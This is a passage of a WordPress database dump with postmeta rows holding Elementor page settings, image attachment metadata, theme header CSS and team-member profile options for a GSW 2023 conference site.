-webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\\\"][vc_column offset=\\\"vc_col-lg-12 vc_col-md-12\\\"][ultimate_heading main_heading=\\\"GSW\'2023 By\\\" main_heading_color=\\\"#ffffff\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" margin_design_tab_text=\\\"\\\"][\\/ultimate_heading][dt_team_masonry img_border_radius=\\\"0px\\\" bwb_columns=\\\"desktop:2|h_tablet:2|v_tablet:2|phone:1\\\" post_title_bottom_margin=\\\"0px\\\" soc_icon_border_width=\\\"0px\\\" soc_icon_color=\\\"#ffffff\\\" posts_offset=\\\"0\\\" category=\\\"\\\"][\\/vc_column][\\/vc_row]<\\/p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),
(6452,2396,'_elementor_page_assets','a:0:{}'),
(6453,2396,'_elementor_page_settings','a:15:{s:19:\"the7_document_title\";s:9:\"slideshow\";s:41:\"the7_document_slideshow_revolution_slider\";s:28:\"the7-software-company-slider\";s:42:\"the7_document_disabled_header_color_scheme\";s:5:\"light\";s:41:\"the7_document__background_below_slideshow\";s:8:\"disabled\";s:39:\"the7_document_fancy_header_color_scheme\";s:5:\"light\";s:30:\"the7_document_sidebar_position\";s:8:\"disabled\";s:28:\"the7_document_show_footer_wa\";s:1:\"0\";s:25:\"the7_document_padding_top\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:27:\"the7_document_padding_right\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:28:\"the7_document_padding_bottom\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:26:\"the7_document_padding_left\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:32:\"the7_document_mobile_padding_top\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:34:\"the7_document_mobile_padding_right\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:35:\"the7_document_mobile_padding_bottom\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:33:\"the7_document_mobile_padding_left\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}}'),
(6454,2396,'_elementor_css','a:7:{s:4:\"time\";i:1665148472;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),
(6466,2095,'_edit_lock','1675594749:1'),
(6467,2402,'_wp_attached_file','2020/04/hd3m.jpg'),
(6468,2402,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:400;s:6:\"height\";i:300;s:4:\"file\";s:16:\"2020/04/hd3m.jpg\";s:8:\"filesize\";i:37552;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"hd3m-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10554;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"hd3m-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5925;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(6680,2473,'_wp_attached_file','2022/10/enm.jpg'),
(6681,2473,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:400;s:6:\"height\";i:300;s:4:\"file\";s:15:\"2022/10/enm.jpg\";s:8:\"filesize\";i:69860;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"enm-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19308;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"enm-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8899;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(6819,2482,'_wp_attached_file','2022/10/1-1.jpg'),
(6820,2482,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:15:\"2022/10/1-1.jpg\";s:8:\"filesize\";i:27298;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5497;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(6825,2487,'_edit_lock','1665765626:1'),
(6826,2488,'_wp_attached_file','2022/10/1-2.jpg'),
(6827,2488,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:15:\"2022/10/1-2.jpg\";s:8:\"filesize\";i:27298;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"1-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5497;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(6828,2487,'_thumbnail_id','2488'),
(6829,2487,'_edit_last','1'),
(6830,2487,'_dt_sidebar_position','disabled'),
(6831,2487,'_dt_sidebar_widgetarea_id','sidebar_1'),
(6832,2487,'_dt_sidebar_hide_on_mobile','0'),
(6833,2487,'_dt_footer_show','1'),
(6834,2487,'_dt_footer_widgetarea_id','sidebar_2'),
(6835,2487,'_dt_footer_hide_on_mobile','0'),
(6836,2487,'_dt_header_title','fancy'),
(6837,2487,'_dt_header_background','normal'),
(6838,2487,'_dt_header_background_below_slideshow','disabled'),
(6839,2487,'_dt_header_transparent_bg_color_scheme','light'),
(6840,2487,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(6841,2487,'_dt_header_transparent_top_bar_bg_opacity','25'),
(6842,2487,'_dt_header_transparent_bg_color','#000000'),
(6843,2487,'_dt_header_transparent_bg_opacity','50'),
(6844,2487,'_dt_header_disabled_background','normal'),
(6845,2487,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(6846,2487,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(6847,2487,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(6848,2487,'_dt_header_disabled_transparent_bg_color','#000000'),
(6849,2487,'_dt_header_disabled_transparent_bg_opacity','50'),
(6850,2487,'_dt_page_overrides_top_margin',''),
(6851,2487,'_dt_page_overrides_right_margin',''),
(6852,2487,'_dt_page_overrides_bottom_margin',''),
(6853,2487,'_dt_page_overrides_left_margin',''),
(6854,2487,'_dt_mobile_page_padding_top',''),
(6855,2487,'_dt_mobile_page_padding_right',''),
(6856,2487,'_dt_mobile_page_padding_bottom',''),
(6857,2487,'_dt_mobile_page_padding_left',''),
(6858,2487,'_dt_fancy_header_layout_heading',''),
(6859,2487,'_dt_fancy_header_title_aligment','center'),
(6860,2487,'_dt_fancy_header_height','300'),
(6861,2487,'_dt_fancy_header_padding-top','0px'),
(6862,2487,'_dt_fancy_header_padding-bottom','0px'),
(6863,2487,'_dt_fancy_header_breadcrumbs_heading',''),
(6864,2487,'_dt_fancy_header_breadcrumbs','disabled'),
(6865,2487,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(6866,2487,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(6867,2487,'_dt_fancy_header_title_heading',''),
(6868,2487,'_dt_fancy_header_title_mode','custom'),
(6869,2487,'_dt_fancy_header_title','Prof. Jun Chen, National Geomatics Center of China, China'),
(6870,2487,'_dt_fancy_header_title_font_size','30'),
(6871,2487,'_dt_fancy_header_title_line_height','36'),
(6872,2487,'_dt_fancy_header_text_transform','none'),
(6873,2487,'_dt_fancy_header_title_color_mode','color'),
(6874,2487,'_dt_fancy_header_title_color','#ffffff'),
(6875,2487,'_dt_fancy_header_subtitle_heading',''),
(6876,2487,'_dt_fancy_header_subtitle',''),
(6877,2487,'_dt_fancy_header_subtitle_font_size','18'),
(6878,2487,'_dt_fancy_header_subtitle_line_height','26'),
(6879,2487,'_dt_fancy_header_subtitle_text_transform','none'),
(6880,2487,'_dt_fancy_header_subtitle_color_mode','color'),
(6881,2487,'_dt_fancy_header_subtitle_color','#ffffff'),
(6882,2487,'_dt_fancy_header_bg_heading',''),
(6883,2487,'_dt_fancy_header_bg_color','#222222'),
(6884,2487,'_dt_fancy_header_bg_image_origin','custom'),
(6885,2487,'_dt_fancy_header_bg_image','a:0:{}'),
(6886,2487,'_dt_fancy_header_bg_repeat','no-repeat'),
(6887,2487,'_dt_fancy_header_bg_position_x','center'),
(6888,2487,'_dt_fancy_header_bg_position_y','center'),
(6889,2487,'_dt_fancy_header_bg_fullscreen','1'),
(6890,2487,'_dt_fancy_header_bg_overlay','0'),
(6891,2487,'_dt_fancy_header_overlay_color','#000'),
(6892,2487,'_dt_fancy_header_bg_overlay_opacity','50'),
(6893,2487,'_dt_fancy_header_scroll_effect','default'),
(6894,2487,'_dt_fancy_header_bg_parallax','0.5'),
(6895,2487,'_dt_fancy_header_responsiveness_heading',''),
(6896,2487,'_dt_fancy_header_responsiveness','enabled'),
(6897,2487,'_dt_fancy_header_responsiveness_switch','778px'),
(6898,2487,'_dt_fancy_header_responsive_height','70'),
(6899,2487,'_dt_fancy_header_responsive_font_size','30'),
(6900,2487,'_dt_fancy_header_responsive_title_line_height','38'),
(6901,2487,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(6902,2487,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(6903,2487,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(6904,2487,'_dt_teammate_options_go_to_single','1'),
(6905,2487,'_dt_teammate_options_position',''),
(6906,2487,'_dt_teammate_options_website',''),
(6907,2487,'_dt_teammate_options_mail',''),
(6908,2487,'_dt_teammate_options_facebook',''),
(6909,2487,'_dt_teammate_options_twitter',''),
(6910,2487,'_dt_teammate_options_dribbble',''),
(6911,2487,'_dt_teammate_options_you-tube',''),
(6912,2487,'_dt_teammate_options_rss',''),
(6913,2487,'_dt_teammate_options_delicious',''),
(6914,2487,'_dt_teammate_options_flickr',''),
(6915,2487,'_dt_teammate_options_lastfm',''),
(6916,2487,'_dt_teammate_options_linkedin',''),
(6917,2487,'_dt_teammate_options_vimeo',''),
(6918,2487,'_dt_teammate_options_tumbler',''),
(6919,2487,'_dt_teammate_options_pinterest',''),
(6920,2487,'_dt_teammate_options_devian',''),
(6921,2487,'_dt_teammate_options_skype',''),
(6922,2487,'_dt_teammate_options_github',''),
(6923,2487,'_dt_teammate_options_instagram',''),
(6924,2487,'_dt_teammate_options_stumbleupon',''),
(6925,2487,'_dt_teammate_options_behance',''),
(6926,2487,'_dt_teammate_options_px-500',''),
(6927,2487,'_dt_teammate_options_tripedvisor',''),
(6928,2487,'_dt_teammate_options_vk',''),
(6929,2487,'_dt_teammate_options_foursquare',''),
(6930,2487,'_dt_teammate_options_xing',''),
(6931,2487,'_dt_teammate_options_weibo',''),
(6932,2487,'_dt_teammate_options_odnoklassniki',''),
(6933,2487,'_dt_teammate_options_research-gate',''),
(6934,2487,'_dt_teammate_options_yelp',''),
(6935,2487,'_dt_teammate_options_blogger',''),
(6936,2487,'_dt_teammate_options_soundcloud',''),
(6937,2487,'_dt_teammate_options_viber',''),
(6938,2487,'_dt_teammate_options_whatsapp',''),
(6939,2487,'_dt_teammate_options_reddit',''),
(6940,2487,'_dt_teammate_options_snapchat',''),
(6941,2487,'_dt_teammate_options_telegram',''),
(6942,2487,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(6947,2495,'_edit_lock','1670304283:1'),
(6948,2496,'_wp_attached_file','2022/10/2.jpg'),
(6949,2496,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:13:\"2022/10/2.jpg\";s:8:\"filesize\";i:38412;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4697;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(6950,2495,'_thumbnail_id','2496'),
(6951,2495,'_edit_last','1'),
(6952,2495,'_dt_sidebar_position','disabled'),
(6953,2495,'_dt_sidebar_widgetarea_id','sidebar_1'),
(6954,2495,'_dt_sidebar_hide_on_mobile','0'),
(6955,2495,'_dt_footer_show','1'),
(6956,2495,'_dt_footer_widgetarea_id','sidebar_2'),
(6957,2495,'_dt_footer_hide_on_mobile','0'),
(6958,2495,'_dt_header_title','fancy'),
(6959,2495,'_dt_header_background','normal'),
(6960,2495,'_dt_header_background_below_slideshow','disabled'),
(6961,2495,'_dt_header_transparent_bg_color_scheme','light'),
(6962,2495,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(6963,2495,'_dt_header_transparent_top_bar_bg_opacity','25'),
(6964,2495,'_dt_header_transparent_bg_color','#000000'),
(6965,2495,'_dt_header_transparent_bg_opacity','50'),
(6966,2495,'_dt_header_disabled_background','normal'),
(6967,2495,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(6968,2495,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(6969,2495,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(6970,2495,'_dt_header_disabled_transparent_bg_color','#000000'),
(6971,2495,'_dt_header_disabled_transparent_bg_opacity','50'),
(6972,2495,'_dt_page_overrides_top_margin',''),
(6973,2495,'_dt_page_overrides_right_margin',''),
(6974,2495,'_dt_page_overrides_bottom_margin',''),
(6975,2495,'_dt_page_overrides_left_margin',''),
(6976,2495,'_dt_mobile_page_padding_top',''),
(6977,2495,'_dt_mobile_page_padding_right',''),
(6978,2495,'_dt_mobile_page_padding_bottom',''),
(6979,2495,'_dt_mobile_page_padding_left',''),
(6980,2495,'_dt_teammate_options_go_to_single','1'),
(6981,2495,'_dt_teammate_options_position',''),
(6982,2495,'_dt_teammate_options_website',''),
(6983,2495,'_dt_teammate_options_mail',''),
(6984,2495,'_dt_teammate_options_facebook',''),
(6985,2495,'_dt_teammate_options_twitter',''),
(6986,2495,'_dt_teammate_options_dribbble',''),
(6987,2495,'_dt_teammate_options_you-tube',''),
(6988,2495,'_dt_teammate_options_rss',''),
(6989,2495,'_dt_teammate_options_delicious',''),
(6990,2495,'_dt_teammate_options_flickr',''),
(6991,2495,'_dt_teammate_options_lastfm',''),
(6992,2495,'_dt_teammate_options_linkedin',''),
(6993,2495,'_dt_teammate_options_vimeo',''),
(6994,2495,'_dt_teammate_options_tumbler',''),
(6995,2495,'_dt_teammate_options_pinterest',''),
(6996,2495,'_dt_teammate_options_devian',''),
(6997,2495,'_dt_teammate_options_skype',''),
(6998,2495,'_dt_teammate_options_github',''),
(6999,2495,'_dt_teammate_options_instagram',''),
(7000,2495,'_dt_teammate_options_stumbleupon',''),
(7001,2495,'_dt_teammate_options_behance',''),
(7002,2495,'_dt_teammate_options_px-500',''),
(7003,2495,'_dt_teammate_options_tripedvisor',''),
(7004,2495,'_dt_teammate_options_vk',''),
(7005,2495,'_dt_teammate_options_foursquare',''),
(7006,2495,'_dt_teammate_options_xing',''),
(7007,2495,'_dt_teammate_options_weibo',''),
(7008,2495,'_dt_teammate_options_odnoklassniki',''),
(7009,2495,'_dt_teammate_options_research-gate',''),
(7010,2495,'_dt_teammate_options_yelp',''),
(7011,2495,'_dt_teammate_options_blogger',''),
(7012,2495,'_dt_teammate_options_soundcloud',''),
(7013,2495,'_dt_teammate_options_viber',''),
(7014,2495,'_dt_teammate_options_whatsapp',''),
(7015,2495,'_dt_teammate_options_reddit',''),
(7016,2495,'_dt_teammate_options_snapchat',''),
(7017,2495,'_dt_teammate_options_telegram',''),
(7019,2498,'_edit_lock','1665293893:1'),
(7020,2499,'_wp_attached_file','2022/10/3.jpg'),
(7021,2499,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:13:\"2022/10/3.jpg\";s:8:\"filesize\";i:47053;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6105;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7022,2498,'_thumbnail_id','2499'),
(7023,2498,'_edit_last','1'),
(7024,2498,'_dt_sidebar_position','disabled'),
(7025,2498,'_dt_sidebar_widgetarea_id','sidebar_1'),
(7026,2498,'_dt_sidebar_hide_on_mobile','0'),
(7027,2498,'_dt_footer_show','1'),
(7028,2498,'_dt_footer_widgetarea_id','sidebar_2'),
(7029,2498,'_dt_footer_hide_on_mobile','0'),
(7030,2498,'_dt_header_title','fancy'),
(7031,2498,'_dt_header_background','normal'),
(7032,2498,'_dt_header_background_below_slideshow','disabled'),
(7033,2498,'_dt_header_transparent_bg_color_scheme','light'),
(7034,2498,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(7035,2498,'_dt_header_transparent_top_bar_bg_opacity','25'),
(7036,2498,'_dt_header_transparent_bg_color','#000000'),
(7037,2498,'_dt_header_transparent_bg_opacity','50'),
(7038,2498,'_dt_header_disabled_background','normal'),
(7039,2498,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(7040,2498,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(7041,2498,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(7042,2498,'_dt_header_disabled_transparent_bg_color','#000000'),
(7043,2498,'_dt_header_disabled_transparent_bg_opacity','50'),
(7044,2498,'_dt_page_overrides_top_margin',''),
(7045,2498,'_dt_page_overrides_right_margin',''),
(7046,2498,'_dt_page_overrides_bottom_margin',''),
(7047,2498,'_dt_page_overrides_left_margin',''),
(7048,2498,'_dt_mobile_page_padding_top',''),
(7049,2498,'_dt_mobile_page_padding_right',''),
(7050,2498,'_dt_mobile_page_padding_bottom',''),
(7051,2498,'_dt_mobile_page_padding_left',''),
(7052,2498,'_dt_teammate_options_go_to_single','1'),
(7053,2498,'_dt_teammate_options_position',''),
(7054,2498,'_dt_teammate_options_website',''),
(7055,2498,'_dt_teammate_options_mail',''),
(7056,2498,'_dt_teammate_options_facebook',''),
(7057,2498,'_dt_teammate_options_twitter',''),
(7058,2498,'_dt_teammate_options_dribbble',''),
(7059,2498,'_dt_teammate_options_you-tube',''),
(7060,2498,'_dt_teammate_options_rss',''),
(7061,2498,'_dt_teammate_options_delicious',''),
(7062,2498,'_dt_teammate_options_flickr',''),
(7063,2498,'_dt_teammate_options_lastfm',''),
(7064,2498,'_dt_teammate_options_linkedin',''),
(7065,2498,'_dt_teammate_options_vimeo',''),
(7066,2498,'_dt_teammate_options_tumbler',''),
(7067,2498,'_dt_teammate_options_pinterest',''),
(7068,2498,'_dt_teammate_options_devian',''),
(7069,2498,'_dt_teammate_options_skype',''),
(7070,2498,'_dt_teammate_options_github',''),
(7071,2498,'_dt_teammate_options_instagram',''),
(7072,2498,'_dt_teammate_options_stumbleupon',''),
(7073,2498,'_dt_teammate_options_behance',''),
(7074,2498,'_dt_teammate_options_px-500',''),
(7075,2498,'_dt_teammate_options_tripedvisor',''),
(7076,2498,'_dt_teammate_options_vk',''),
(7077,2498,'_dt_teammate_options_foursquare',''),
(7078,2498,'_dt_teammate_options_xing',''),
(7079,2498,'_dt_teammate_options_weibo',''),
(7080,2498,'_dt_teammate_options_odnoklassniki',''),
(7081,2498,'_dt_teammate_options_research-gate',''),
(7082,2498,'_dt_teammate_options_yelp',''),
(7083,2498,'_dt_teammate_options_blogger',''),
(7084,2498,'_dt_teammate_options_soundcloud',''),
(7085,2498,'_dt_teammate_options_viber',''),
(7086,2498,'_dt_teammate_options_whatsapp',''),
(7087,2498,'_dt_teammate_options_reddit',''),
(7088,2498,'_dt_teammate_options_snapchat',''),
(7089,2498,'_dt_teammate_options_telegram',''),
(7090,2500,'_edit_lock','1665293974:1'),
(7091,2501,'_wp_attached_file','2022/10/4.jpg'),
(7092,2501,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:13:\"2022/10/4.jpg\";s:8:\"filesize\";i:36555;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5015;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7093,2500,'_thumbnail_id','2501'),
(7094,2500,'_edit_last','1'),
(7095,2500,'_dt_sidebar_position','disabled'),
(7096,2500,'_dt_sidebar_widgetarea_id','sidebar_1'),
(7097,2500,'_dt_sidebar_hide_on_mobile','0'),
(7098,2500,'_dt_footer_show','1'),
(7099,2500,'_dt_footer_widgetarea_id','sidebar_2'),
(7100,2500,'_dt_footer_hide_on_mobile','0'),
(7101,2500,'_dt_header_title','fancy'),
(7102,2500,'_dt_header_background','normal'),
(7103,2500,'_dt_header_background_below_slideshow','disabled'),
(7104,2500,'_dt_header_transparent_bg_color_scheme','light'),
(7105,2500,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(7106,2500,'_dt_header_transparent_top_bar_bg_opacity','25'),
(7107,2500,'_dt_header_transparent_bg_color','#000000'),
(7108,2500,'_dt_header_transparent_bg_opacity','50'),
(7109,2500,'_dt_header_disabled_background','normal'),
(7110,2500,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(7111,2500,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(7112,2500,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(7113,2500,'_dt_header_disabled_transparent_bg_color','#000000'),
(7114,2500,'_dt_header_disabled_transparent_bg_opacity','50'),
(7115,2500,'_dt_page_overrides_top_margin',''),
(7116,2500,'_dt_page_overrides_right_margin',''),
(7117,2500,'_dt_page_overrides_bottom_margin',''),
(7118,2500,'_dt_page_overrides_left_margin',''),
(7119,2500,'_dt_mobile_page_padding_top',''),
(7120,2500,'_dt_mobile_page_padding_right',''),
(7121,2500,'_dt_mobile_page_padding_bottom',''),
(7122,2500,'_dt_mobile_page_padding_left',''),
(7123,2500,'_dt_teammate_options_go_to_single','1'),
(7124,2500,'_dt_teammate_options_position',''),
(7125,2500,'_dt_teammate_options_website',''),
(7126,2500,'_dt_teammate_options_mail',''),
(7127,2500,'_dt_teammate_options_facebook',''),
(7128,2500,'_dt_teammate_options_twitter',''),
(7129,2500,'_dt_teammate_options_dribbble',''),
(7130,2500,'_dt_teammate_options_you-tube',''),
(7131,2500,'_dt_teammate_options_rss',''),
(7132,2500,'_dt_teammate_options_delicious',''),
(7133,2500,'_dt_teammate_options_flickr',''),
(7134,2500,'_dt_teammate_options_lastfm',''),
(7135,2500,'_dt_teammate_options_linkedin',''),
(7136,2500,'_dt_teammate_options_vimeo',''),
(7137,2500,'_dt_teammate_options_tumbler',''),
(7138,2500,'_dt_teammate_options_pinterest',''),
(7139,2500,'_dt_teammate_options_devian',''),
(7140,2500,'_dt_teammate_options_skype',''),
(7141,2500,'_dt_teammate_options_github',''),
(7142,2500,'_dt_teammate_options_instagram',''),
(7143,2500,'_dt_teammate_options_stumbleupon',''),
(7144,2500,'_dt_teammate_options_behance',''),
(7145,2500,'_dt_teammate_options_px-500',''),
(7146,2500,'_dt_teammate_options_tripedvisor',''),
(7147,2500,'_dt_teammate_options_vk',''),
(7148,2500,'_dt_teammate_options_foursquare',''),
(7149,2500,'_dt_teammate_options_xing',''),
(7150,2500,'_dt_teammate_options_weibo',''),
(7151,2500,'_dt_teammate_options_odnoklassniki',''),
(7152,2500,'_dt_teammate_options_research-gate',''),
(7153,2500,'_dt_teammate_options_yelp',''),
